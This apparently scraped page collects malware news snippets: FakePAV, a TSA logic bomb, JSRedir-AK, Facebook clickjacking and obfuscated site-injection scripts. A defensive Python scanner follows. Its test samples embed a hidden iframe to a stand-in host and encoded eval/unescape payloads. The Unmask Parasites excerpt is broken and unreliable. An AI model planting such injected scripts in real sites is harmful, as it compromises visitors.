
Malware


Rocra Espionage Malware Campaign Uncovered After Five Years of Activity

MSRT Tackles Fake Microsoft Security Essentials - Microsoft Malware Protection Center

We've seen a few rogue security programs use elements of legitimate security software in order to try to make themselves appear more authentic. It was inevitable that Microsoft Security Essentials would be the target of this kind of mimicry. While some rogues have simply copied Security Essentials' name, others have gone further by imitating elements of the Security Essentials user interface. By far the most prevalent of these is Win32/FakePAV, which is this month's addition to the MSRT family list.

When FakePAV sees an attempt to run certain programs, it displays a fake Security Essentials alert dialog. At first glance, there is very little that differentiates this from a real Security Essentials alert, beyond the bogus malware name ("Unknown Win32/Trojan"). You can close the window, but in a crude attempt to emulate the behavior of real-time malware blocking, FakePAV also terminates the program that it reports as a threat. It then pretends to scan the file again.

-- Hamish O'Dea

Feds: TSA Worker Tried to Sabotage Terror Database | Threat Level

A former Transportation Security Administration contractor is being charged in Colorado for allegedly injecting malicious code into a government network used for screening airport security workers and others. The malicious code, a logic bomb installed last October, was designed to damage and disrupt data on servers on an undisclosed date, but was caught by other workers before it delivered its payload.

Douglas James Duchak, 46, had worked as a data analyst at the TSA’s Colorado Springs Operations Center, or CSOC, since 2004. The CSOC is used to vet people who have “access to sensitive information and secure areas of the nation’s transportation network,” according to the indictment. A source involved in the case said this involved screening of both passengers and workers at airports and other transportation facilities. He pleaded not guilty in a Denver federal court on Wednesday and was released on a $25,000 unsecured bond. Duchak has been charged in the U.S.

Quarter Million Malicious Facebook Posts « Defensio, the blog

Posted: 16 Apr 2014 03:45 AM | Elad Sharf | Targeted attacks are one of the hottest topics in the cyber security community today. Often when the term 'targeted attack' is used, a politically-motivated attack springs to mind, or what we like to call Cyberwarfare - a low volume and state-sponsored targeted attack that in many cases employs...

Filed under: Targeted attacks, Zeus, Toolkits, cyber-crime, Citadel

Posted: 11 Apr 2014 03:15 | Jason Hill | Following on from our previous Heartbleed post, there have been countless reports on the far-reaching scale of this critical security flaw along with numerous discussions as to what 'exactly' an attacker can gain from exploiting the vulnerability. Given the online and 'connected' nature...

Filed under: Vulnerabilities, Exploit, CVE-2014-0160, OpenSSL, Heartbleed

Posted: 09 Apr 2014 05:56 | Carl Leonard |

Posted: 02 Apr 2014 05:07 | Sindyan |

Filed under: Malware, exploit kit, FIESTA, iframe

More on Troj/JSRedir-AK | SophosLabs blog

Since first releasing detection (2 days ago) for Troj/JSRedir-AK, SophosLabs have seen thousands of websites affected by it. Since blogging yesterday we have seen a few minor variants and have had to update our detection. One of the updates has been to detect the malicious script when appended to HTML files within script tags as well as when appended to JavaScript files.

Sophos has been contacting owners of affected websites, and one of the main methods of infection is via compromised FTP credentials.

New Facebook Clickjacking Attack Is on the Loose [WARNING]

A new Facebook clickjacking attack is making the rounds, and this one is as sly as they come. The attack spreads through a malicious website, leading users to a YouTube video. The method used to spread the link is particularly interesting. A Facebook user sees a post on a friend's wall, with a thumbnail and the caption "New Pix." Clicking on this link will lead you to the aforementioned video, but it will also spread by posting the same link on your own wall, seemingly without your intervention.

The trick is in the fake Turing test, seemingly set up to determine if the user is human. Needless to say, this type of attack can easily trick the user into opening something far more dangerous than a YouTube video.

From Hidden Iframes to Obfuscated Scripts | Unmask Parasites. Blog

23 Dec 09, filed in Website exploits

In December, I noticed that the ubiquitous hidden iframes that have been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites. At the same time I noticed a new type of obfuscated scripts injected into hacked websites.

And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.

Here’s the story

A few weeks ago I stumbled upon an infected site with the following script: When I deobfuscated it, it made me laugh.

.ru:8080/google.com/google.com/bing.com/google.fr/wordpress.org/

This looked like overkill. Joomla-orgspankwire.comw3schools-comgoogle.com (2 times!)

Variations

Common features

This set of 5 IPs is not static.

Security firms gird for attacks on smart phones

Mobile devices have been mostly spared from the onslaught of cyber-attacks that prey on computer users every day, but security vendors are already positioning themselves in anticipation of a swell in demand for such services and products in the next couple of years.

Last month, for instance, Sunnyvale security company Symantec announced it would begin offering free online software and services to protect data on smart phones. Santa Clara competitor McAfee said the same week it will acquire mobile security firm Trust Digital in a deal set to be completed by the end of the month. Most of the other big names in the security market, like Kaspersky, AVG and Trend Micro, already offer some kind of mobile solution as well. "Nobody's making money at the moment with mobile security."

Mobile security today mostly revolves around protecting this data and minimizing the risks of phone theft or loss.

Not at critical mass

In the computer world, "basically everybody is on Windows," he said.
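The Troj/JSRedir-AK and Unmask Parasites entries above describe the same server-side symptom from two angles: an obfuscated script appended to a site's JavaScript files or tacked onto its HTML inside script tags, and, in the earlier wave, hidden iframes pointing at a hostile host whose URL path is padded with well-known domain names. The scanner below is an added example, not code from SophosLabs, Unmask Parasites or any vendor named on this page; it walks a web root and flags those patterns. The file extensions, the obfuscation markers, the hidden-iframe attributes and the padded-path regex are assumed heuristics, and the sample files are constructed, not taken from any infected site.

```python
"""Constructed scanner for the web-site injection patterns in the entries above."""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Assumed: which extensions are treated as HTML or JavaScript.
HTML_EXT = {".html", ".htm", ".php"}
JS_EXT = {".js"}

# Assumed heuristics for obfuscated injected JavaScript: eval/unescape/
# fromCharCode calls, or a long run of %XX / \xXX escapes.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode(")
LONG_ESCAPE_RUN = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){16,}", re.I)

# Assumed: an iframe sized to zero or styled invisible counts as "hidden".
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:\bwidth\s*=\s*[\"']?0\b|\bheight\s*=\s*[\"']?0\b"
    r"|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>",
    re.I,
)
# A URL whose path is padded with two or more well-known-looking domain
# names, the shape of the decoded .ru:8080/google.com/google.com/... URL.
PADDED_URL = re.compile(
    r"https?://[^\s\"'<>]+?/(?:[a-z0-9-]+\.(?:com|org|net|fr)/){2,}", re.I
)
SCRIPT_BLOCK = re.compile(r"<script\b.*?</script>", re.I | re.S)


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str
    snippet: str


def looks_obfuscated(code: str) -> bool:
    low = code.lower()
    return any(m in low for m in OBFUSCATION_MARKERS) or bool(LONG_ESCAPE_RUN.search(code))


def scan_text(path: str, text: str) -> list[Finding]:
    """Return findings for one file's content; the path only selects the rules."""
    ext = os.path.splitext(path)[1].lower()
    found: list[Finding] = []
    if ext in HTML_EXT:
        # Injected scripts are appended, so anything after </html> is suspect.
        end = text.lower().rfind("</html>")
        tail = text[end + len("</html>"):] if end >= 0 else ""
        for m in SCRIPT_BLOCK.finditer(tail):
            found.append(Finding(path, "script-after-html", m.group(0)[:80]))
        # Obfuscated inline scripts inside the document itself.
        for m in SCRIPT_BLOCK.finditer(text):
            if (end < 0 or m.start() < end) and looks_obfuscated(m.group(0)):
                found.append(Finding(path, "obfuscated-inline-script", m.group(0)[:80]))
    elif ext in JS_EXT:
        # For .js files the injected code is appended: check the last line only.
        lines = [ln for ln in text.splitlines() if ln.strip()]
        if lines and looks_obfuscated(lines[-1]):
            found.append(Finding(path, "appended-obfuscated-js", lines[-1][:80]))
    for m in HIDDEN_IFRAME.finditer(text):
        found.append(Finding(path, "hidden-iframe", m.group(0)[:80]))
    for m in PADDED_URL.finditer(text):
        found.append(Finding(path, "domain-padded-url", m.group(0)[:80]))
    return found


def scan_tree(root: str) -> list[Finding]:
    """Walk a web root on disk and scan every HTML/JS file."""
    out: list[Finding] = []
    for d, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in HTML_EXT | JS_EXT:
                p = os.path.join(d, name)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    out.extend(scan_text(p, fh.read()))
    return out


# Constructed sample files (not real infected content).
SAMPLES = {
    "site/index.html": '<html><body><p>hi</p><script src="/app.js"></script></body></html>\n',
    "site/js/app.js": "function init(){ document.getElementById('x').textContent = 'hi'; }\n",
    "site/about.html": (
        "<html><body><p>hi</p></body></html>\n"
        "<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D"
        "%22%68%74%74%70%3A%2F%2F%65%76%69%6C%2D%68%6F%73%74%2E%72%75%22%3E'))</script>\n"
    ),
    "site/js/menu.js": (
        "function menu(){ return 1; }\n\n"
        "eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%22%29'))\n"
    ),
    "site/contact.html": (
        "<html><body>\n"
        '<iframe src="http://evil-host.ru:8080/google.com/google.com/bing.com/google.fr/wordpress.org/"'
        ' width="0" height="0" style="visibility:hidden"></iframe>\n'
        "</body></html>\n"
    ),
}


def scan_samples() -> dict[str, list[str]]:
    """Map each sample path to the kinds of finding the scanner raises."""
    return {p: [f.kind for f in scan_text(p, t)] for p, t in SAMPLES.items()}


if __name__ == "__main__":
    for path, kinds in scan_samples().items():
        print(f"{path}: {', '.join(kinds) or 'clean'}")
```

Run `scan_tree("/var/www/site")` over a checkout of the site after rotating the FTP credentials, since the SophosLabs entry names those as the way the files were modified in the first place. The markers will also fire on some legitimately minified or packed code, so treat a hit as a file to diff against a known-good copy from version control or backup rather than as proof of infection on its own.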